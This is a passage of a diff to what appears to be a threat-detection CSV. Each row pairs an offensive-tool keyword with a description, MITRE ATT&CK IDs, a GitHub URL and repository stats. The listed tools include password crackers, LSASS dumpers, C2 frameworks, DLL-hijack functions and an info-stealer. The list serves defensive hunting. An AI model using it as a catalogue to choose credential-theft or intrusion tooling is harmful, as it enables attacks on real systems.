Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential 
Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/user.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/vnc_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/windows_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/windows_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*wordlist_TLAs.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--wordlist=*-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*wordlist-nthash-reversed*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*wordlist-probable.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*wordlists*rmg.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*wordlists*rmiscout.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*wordlists/dynamic-all.txt*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*wordlists/fasttrack.txt*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. 
Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*wordlists/rockyou.txt'*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*wordlists/subdomains-5000.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" -"*wordlists/top1million.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*wordlists*rmg.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*wordlists*rmiscout.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*wordlists/dynamic-all.txt*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*wordlists/fasttrack.txt*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*wordlists/rockyou.txt'*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*wordlists/subdomains-5000.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*wordlists/top1million.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "*WorldWind Stealer.zip*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - 
TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" "*WorldWind-Stealer*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" -"*wpapcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*wp-exploitable-plugins.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*wpapcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*wp-exploitable-plugins.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*wpscan --api-token *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*WPScan*","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","7829","1230","2023-10-02T10:48:40Z","2012-07-11T20:27:47Z" +"*WPScan*","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","7831","1230","2023-10-02T10:48:40Z","2012-07-11T20:27:47Z" "*wrap_execute_assembly*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" 
"*wrap_execute_encoded_powershell*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*wrap_get_clipboard*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" 
@@ -18466,21 +18654,21 @@ "*write_payload_dll_transacted*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*write_what_where.py*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*WriteAndExecuteShellcode*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" -"*WriteDLLPermission.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Write-HijackDll*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Write-Output 127.0.0.1:1111*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" +"*WriteDLLPermission.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Write-HijackDll*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Write-Output 127.0.0.1:1111*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" "*WritePayloadDllTransacted*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Write-PortscanOut*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a 
post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Write-ServiceBinary*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Write-UserAddMSI*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Write-UserAddMSI*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ws://localhost:58082*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*wscript_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" 
